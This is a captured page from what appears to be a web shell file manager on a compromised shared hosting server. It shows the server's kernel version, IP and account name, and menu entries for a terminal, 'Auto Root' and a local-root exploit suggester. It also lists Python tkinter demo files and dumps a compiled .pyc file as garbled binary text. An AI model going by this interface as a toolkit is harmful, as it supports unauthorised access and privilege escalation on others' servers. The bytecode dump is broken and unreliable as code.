Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.217.173
Domains :
Cant Read [ /etc/named.conf ]
User : celfico1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib64 /
python2.7 /
Demo /
tkinter /
ttk /
Delete
Unzip
Name
Size
Permission
Date
Action
img
[ DIR ]
drwxr-xr-x
2026-05-11 18:18
combo_themes.py
1.58
KB
-rw-r--r--
2013-05-12 03:32
combo_themes.pyc
1.88
KB
-rw-r--r--
2026-04-27 16:47
combo_themes.pyo
1.88
KB
-rw-r--r--
2026-04-27 16:47
dirbrowser.py
2.65
KB
-rw-r--r--
2013-05-12 03:32
dirbrowser.pyc
3.9
KB
-rw-r--r--
2026-04-27 16:47
dirbrowser.pyo
3.9
KB
-rw-r--r--
2026-04-27 16:47
listbox_scrollcmd.py
1.13
KB
-rw-r--r--
2013-05-12 03:32
listbox_scrollcmd.pyc
1.56
KB
-rw-r--r--
2026-04-27 16:47
listbox_scrollcmd.pyo
1.56
KB
-rw-r--r--
2026-04-27 16:47
mac_searchentry.py
3.63
KB
-rw-r--r--
2013-05-12 03:32
mac_searchentry.pyc
3.88
KB
-rw-r--r--
2026-04-27 16:47
mac_searchentry.pyo
3.88
KB
-rw-r--r--
2026-04-27 16:47
notebook_closebtn.py
2.47
KB
-rw-r--r--
2013-05-12 03:32
notebook_closebtn.pyc
2.91
KB
-rw-r--r--
2026-04-27 16:47
notebook_closebtn.pyo
2.91
KB
-rw-r--r--
2026-04-27 16:47
plastik_theme.py
9.36
KB
-rw-r--r--
2013-05-12 03:32
plastik_theme.pyc
7.36
KB
-rw-r--r--
2026-04-27 16:47
plastik_theme.pyo
7.36
KB
-rw-r--r--
2026-04-27 16:47
roundframe.py
5.47
KB
-rw-r--r--
2013-05-12 03:32
roundframe.pyc
6.29
KB
-rw-r--r--
2026-04-27 16:47
roundframe.pyo
6.29
KB
-rw-r--r--
2026-04-27 16:47
theme_selector.py
1.92
KB
-rw-r--r--
2013-05-12 03:32
theme_selector.pyc
2.81
KB
-rw-r--r--
2026-04-27 16:47
theme_selector.pyo
2.81
KB
-rw-r--r--
2026-04-27 16:47
treeview_multicolumn.py
4.15
KB
-rw-r--r--
2013-05-12 03:32
treeview_multicolumn.pyc
5.35
KB
-rw-r--r--
2026-04-27 16:47
treeview_multicolumn.pyo
5.35
KB
-rw-r--r--
2026-04-27 16:47
ttkcalendar.py
8.12
KB
-rw-r--r--
2013-05-12 03:32
ttkcalendar.pyc
9.55
KB
-rw-r--r--
2026-04-27 16:47
ttkcalendar.pyo
9.55
KB
-rw-r--r--
2026-04-27 16:47
widget_state.py
2.66
KB
-rw-r--r--
2013-05-12 03:32
widget_state.pyc
3.33
KB
-rw-r--r--
2026-04-27 16:47
widget_state.pyo
3.33
KB
-rw-r--r--
2026-04-27 16:47
Save
Rename
� V �Qc @ sZ d Z d d l Z d d l Z d e j f d � � YZ d � Z e d k rV e � n d S( s� Ttk Theme Selector v2. This is an improvement from the other theme selector (themes_combo.py) since now you can notice theme changes in Ttk Combobox, Ttk Frame, Ttk Label and Ttk Button. i����Nt Appc B s, e Z d � Z d � Z d � Z d � Z RS( c C sH t j j | d d �t j � | _ t j | d � | _ | j � d S( Nt borderwidthi i ( t ttkt Framet __init__t Stylet stylet Tkintert IntVart theme_autochanget _setup_widgets( t self( ( s7 /usr/lib64/python2.7/Demo/tkinter/ttk/theme_selector.pyR s c C s | j j | j j � � d S( N( R t theme_uset themes_combot get( R ( ( s7 /usr/lib64/python2.7/Demo/tkinter/ttk/theme_selector.pyt _change_theme s c C s | j j � r | j � n d S( N( R R R ( R t widget( ( s7 /usr/lib64/python2.7/Demo/tkinter/ttk/theme_selector.pyt _theme_sel_changed s c C s� t j | d d �} | j j � } t j | d | d d �| _ | j j | d � | j j d | j � t j | d d d | j �} t j | d d d | j �} | j d d d d � | j j d d d d d d d d � | j d d d d d d d d � | j d d d d d d d d � | j � } | j d d d �| j d d d �| j d d d �| j d d d d d d d d d d � d S( Nt textt Themest valuest statet readonlyi s <<ComboboxSelected>>s Change Themet commands- Change themes when combobox item is activatedt variablet ipadxi t stickyt wt rowt columni t padxt ewi t et columnspani t padyt weightt nsewt rowspan( R t LabelR t theme_namest ComboboxR t sett bindR t ButtonR t CheckbuttonR t gridt winfo_toplevelt rowconfiguret columnconfigure( R t themes_lblt themest change_btnt theme_change_checkbtnt top( ( s7 /usr/lib64/python2.7/Demo/tkinter/ttk/theme_selector.pyR s&